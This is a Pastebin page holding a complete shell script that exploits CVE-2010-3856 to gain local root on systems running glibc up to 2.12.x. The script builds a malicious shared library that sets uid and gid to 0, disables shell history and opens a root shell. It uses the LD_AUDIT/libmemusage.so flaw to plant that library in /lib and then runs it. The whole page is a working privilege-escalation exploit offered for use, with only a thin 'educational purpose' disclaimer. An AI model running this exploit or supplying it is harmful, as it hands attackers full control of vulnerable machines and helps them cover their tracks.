API tools faq
paste
Advertisement
hackerscommunity

glibc <= 2.12.x LD_AUDIT libmemusage.so local root exploit

hackerscommunity
Mar 22nd, 2016
160
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.01 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/sh
  2. #
  3. # [+] Linux GNU/libc <= 2.12.x LD_AUDIT libmemusage.so local root exploit
  4. #
  5. #  Edited by Todor Donev
  6. #  This is another exploit for CVE-2010-3856
  7. #
  8. #  todor.donev@gmail.com
  9. #  http://www.ethical-hacker.org/
  10. #  https://www.facebook.com/ethicalhackerorg
  11. #  http://pastebin.com/u/hackerscommunity
  12. #
  13. #  Disclaimer:
  14. #  This  or  previous program  is  for Educational
  15. #  purpose ONLY. Do not use it without permission.
  16. #  The  usual  disclaimer  applies, especially the
  17. #  fact  that  Todor Donev  is  not liable for any
  18. #  damages caused by direct or indirect use of the
  19. #  information or functionality  provided by these
  20. #  programs.  The author or any  Internet provider
  21. #  bears  NO  responsibility for content or misuse
  22. #  of these programs or  any  derivatives thereof.
  23. #  By  using  these  programs  you accept the fact
  24. #  that any damage (dataloss, system crash, system
  25. #  compromise,  etc.)  caused  by the use of these
  26. #  programs is not  Todor Donev's  responsibility.
  27. #
  28. #  Use  at  your  own risk and educational purpose
  29. #  ONLY!
  30. #
  31. # Another exploits:
  32. # http://www.0xdeadbeef.info/exploits/raptor_ldaudit
  33. # http://www.0xdeadbeef.info/exploits/raptor_ldaudit2
  34. # http://www.exploit-db.com/exploits/18105/
  35. # http://seclists.org/fulldisclosure/2010/Oct/257
  36. # http://seclists.org/bugtraq/2010/Oct/200
  37. #
  38. echo "[+] Setting umask to 0 so we have world writable files."
  39. umask 0
  40. echo "[+] Preparing binary payload.."
  41. cat > /tmp/payload.c <<_EOF
  42. void __attribute__((constructor)) init()
  43. {
  44.     unlink("/lib/.ploit.so");
  45.     setuid(0);
  46.     setgid(0);
  47.     setenv("HISTFILE", "/dev/null", 1);
  48.     execl("/bin/sh", "/bin/sh", "-i", 0);
  49. }
  50. _EOF
  51. gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
  52. echo "[+] Writing root owned world readable file in /lib"
  53. LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/.ploit.so" ping 2>/dev/null
  54. echo "[+] Filling the lib file with lib contents."
  55. cat /tmp/exploit > /lib/.ploit.so
  56. rm /tmp/payload.c /tmp/exploit
  57. echo "[+] Executing payload.."
  58. LD_AUDIT=".ploit.so" ping
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!